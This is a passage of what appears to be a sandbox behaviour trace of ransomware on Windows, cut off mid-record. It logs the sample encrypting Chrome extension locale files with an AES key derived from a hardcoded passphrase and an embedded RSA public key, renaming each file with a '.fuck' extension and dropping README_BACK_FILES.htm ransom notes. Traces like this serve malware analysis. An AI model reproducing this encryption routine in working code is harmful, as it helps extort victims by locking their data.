(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json")) returned 0x20 [0248.931] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json", dwFileAttributes=0x80) returned 1 [0248.931] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.932] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.933] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.933] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293dcd8) returned 1 [0248.936] CryptCreateHash (in: hProv=0x293dcd8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.936] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0248.936] CryptHashData (hHash=0x2938978, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.936] CryptDeriveKey (in: hProv=0x293dcd8, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937638) returned 1 [0248.936] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.936] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.936] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293d700) returned 1 [0248.936] CryptImportPublicKeyInfo (in: hCryptProv=0x293d700, dwCertEncodingType=0x1, pInfo=0x2930640*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2930670*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2930678*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29377b8) returned 1 [0248.936] CryptEncrypt (in: hKey=0x29377b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.936] CryptEncrypt (in: hKey=0x29377b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293d810*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293d810*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.937] WriteFile (in: hFile=0x5d58, lpBuffer=0x293d810*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293d810*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.938] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x108, lpOverlapped=0x0) returned 1 [0248.939] CryptEncrypt (in: hKey=0x2937638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x108, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0248.939] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0248.939] CloseHandle (hObject=0x5d5c) returned 1 [0248.939] CloseHandle (hObject=0x5d58) returned 1 [0248.940] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json"), bFailIfExists=0) returned 1 [0248.944] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json", dwFileAttributes=0x0) returned 1 [0248.945] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.gsg")) returned 1 [0248.946] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json.fuck")) returned 1 [0248.947] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.947] CryptDestroyKey (hKey=0x2937638) returned 1 [0248.947] CryptReleaseContext (hProv=0x293dcd8, dwFlags=0x0) returned 1 [0248.947] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.947] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.947] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\readme_back_files.htm")) returned 0xffffffff [0248.947] AreFileApisANSI () returned 1 [0248.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.947] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0248.948] GetFileType (hFile=0x5d54) returned 0x1 [0248.948] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.949] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.949] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938978 [0248.950] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.950] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.950] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.950] GetLastError () returned 0x0 [0248.950] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json")) returned 0x20 [0248.951] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json", dwFileAttributes=0x80) returned 1 [0248.951] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.952] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.952] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.953] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d0a0) returned 1 [0248.955] CryptCreateHash (in: hProv=0x293d0a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.955] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0248.955] CryptHashData (hHash=0x29387f8, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.955] CryptDeriveKey (in: hProv=0x293d0a0, Algid=0x6610, hBaseData=0x29387f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937778) returned 1 [0248.955] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.955] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.955] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293e008) returned 1 [0248.956] CryptImportPublicKeyInfo (in: hCryptProv=0x293e008, dwCertEncodingType=0x1, pInfo=0x29318f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2931920*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2931928*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29377f8) returned 1 [0248.956] CryptEncrypt (in: hKey=0x29377f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.956] CryptEncrypt (in: hKey=0x29377f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293dcd8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293dcd8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.956] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293dcd8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293dcd8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.957] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xcf, lpOverlapped=0x0) returned 1 [0248.959] CryptEncrypt (in: hKey=0x2937778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xcf, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0248.959] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0248.959] CloseHandle (hObject=0x5d58) returned 1 [0248.959] CloseHandle (hObject=0x5d5c) returned 1 [0248.959] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json"), bFailIfExists=0) returned 1 [0248.963] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json", dwFileAttributes=0x0) returned 1 [0248.963] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.gsg")) returned 1 [0248.965] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json.fuck")) returned 1 [0248.966] CryptDestroyHash (hHash=0x29387f8) returned 1 [0248.966] CryptDestroyKey (hKey=0x2937778) returned 1 [0248.966] CryptReleaseContext (hProv=0x293d0a0, dwFlags=0x0) returned 1 [0248.966] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.966] FindClose (in: hFindFile=0x2938978 | out: hFindFile=0x2938978) returned 1 [0248.966] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\readme_back_files.htm")) returned 0xffffffff [0248.966] AreFileApisANSI () returned 1 [0248.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.966] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0248.967] GetFileType (hFile=0x5d54) returned 0x1 [0248.967] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.968] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.968] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938978 [0248.968] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.968] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.968] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.968] GetLastError () returned 0x0 [0248.969] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json")) returned 0x20 [0248.969] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json", dwFileAttributes=0x80) returned 1 [0248.969] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.970] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.971] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.971] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d018) returned 1 [0248.977] CryptCreateHash (in: hProv=0x293d018, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.977] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0248.977] CryptHashData (hHash=0x29387f8, pbData=0x28cb788, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.977] CryptDeriveKey (in: hProv=0x293d018, Algid=0x6610, hBaseData=0x29387f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937438) returned 1 [0248.978] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.978] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.978] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293dd60) returned 1 [0248.978] CryptImportPublicKeyInfo (in: hCryptProv=0x293dd60, dwCertEncodingType=0x1, pInfo=0x2931c30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2931c60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2931c68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29378f8) returned 1 [0248.978] CryptEncrypt (in: hKey=0x29378f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: 